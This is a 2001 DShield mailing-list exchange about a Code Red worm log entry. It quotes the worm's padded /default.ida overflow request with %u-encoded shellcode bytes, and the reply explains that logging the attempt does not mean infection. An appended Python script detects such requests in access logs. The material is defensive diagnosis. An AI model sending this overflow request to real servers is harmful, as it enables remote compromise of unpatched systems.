[Dshield] I've got it....

John Groseclose iain at caradoc.org
Sun Aug 5 16:48:22 GMT 2001


At 10:04 AM -0400 8/5/01, Paul Marsh wrote:
>I was checking my logs this morning and found the following....urg
>2001-08-04 18:11:53 209.61.190.91 - GET /default.ida
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90
>90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
>9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 165 3818 63
>80 - -
>
>This is a log from a patched machine, the machine has been patched for weeks
>now????  Does anyone want or need more info?  I'd like to send these things
>to someone for analysis to find out why the patch did not stop ver.2?

Is this a log from a webserver *on* the patched machine? If so, 
you're not infected - you're just logging the attempt to connect.

Is 209.61.190.91 your machine? Or someone else's?
-- 
John Groseclose
iain at caradoc.org
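
An added example, not part of the original message: a small Python check that separates the two questions asked above, whether a log entry is only a recorded inbound request and whether the source address is one of your own machines. The field order is assumed from the quoted log line; the sample lines, addresses and `LOCAL_IPS` set are constructed.

```python
import re

# Assumed field order, read off the quoted log line:
# date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status ...
FIELDS = ("date", "time", "c_ip", "user", "method", "uri_stem", "uri_query", "status")

FILLER = re.compile(r"(.)\1{99,}")       # one character repeated 100+ times
UENC = re.compile(r"%u[0-9a-fA-F]{4}")   # %uXXXX-encoded data in the query


def parse(line):
    """Split one access-log line into named fields; None for comments/short lines."""
    parts = line.split()
    if len(parts) < len(FIELDS) or parts[0].startswith("#"):
        return None
    return dict(zip(FIELDS, parts))


def classify(line, local_ips):
    """Return a finding for a padded .ida request, or None for anything else."""
    rec = parse(line)
    if rec is None or not rec["uri_stem"].lower().endswith(".ida"):
        return None
    query = rec["uri_query"]
    if not (FILLER.search(query) and UENC.search(query)):
        return None
    # The entry only proves that this server received and logged the request.
    # Whose machine sent it is answered by the client address.
    origin = "own-address" if rec["c_ip"] in local_ips else "remote-host"
    return {"when": rec["date"] + " " + rec["time"], "src": rec["c_ip"],
            "status": rec["status"], "origin": origin}


def scan(lines, local_ips):
    """Classify every line and keep only the findings."""
    return [f for f in (classify(l, local_ips) for l in lines) if f]


# Constructed sample data: documentation addresses, shortened made-up query.
PAD = "X" * 224 + "%u9090%u9090=a"
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-08-04 18:11:53 198.51.100.7 - GET /default.ida " + PAD + " 200",
    "2001-08-04 18:12:10 192.0.2.10 - GET /default.ida " + PAD + " 200",
    "2001-08-04 18:12:30 198.51.100.9 - GET /index.html - 200",
]
LOCAL_IPS = {"192.0.2.10"}  # assumption: addresses that belong to your own hosts

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, LOCAL_IPS):
        print(finding)
```

A `remote-host` finding is someone else's machine knocking on your web server; an `own-address` finding means the request came from a host you run, and that host is the one to examine.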



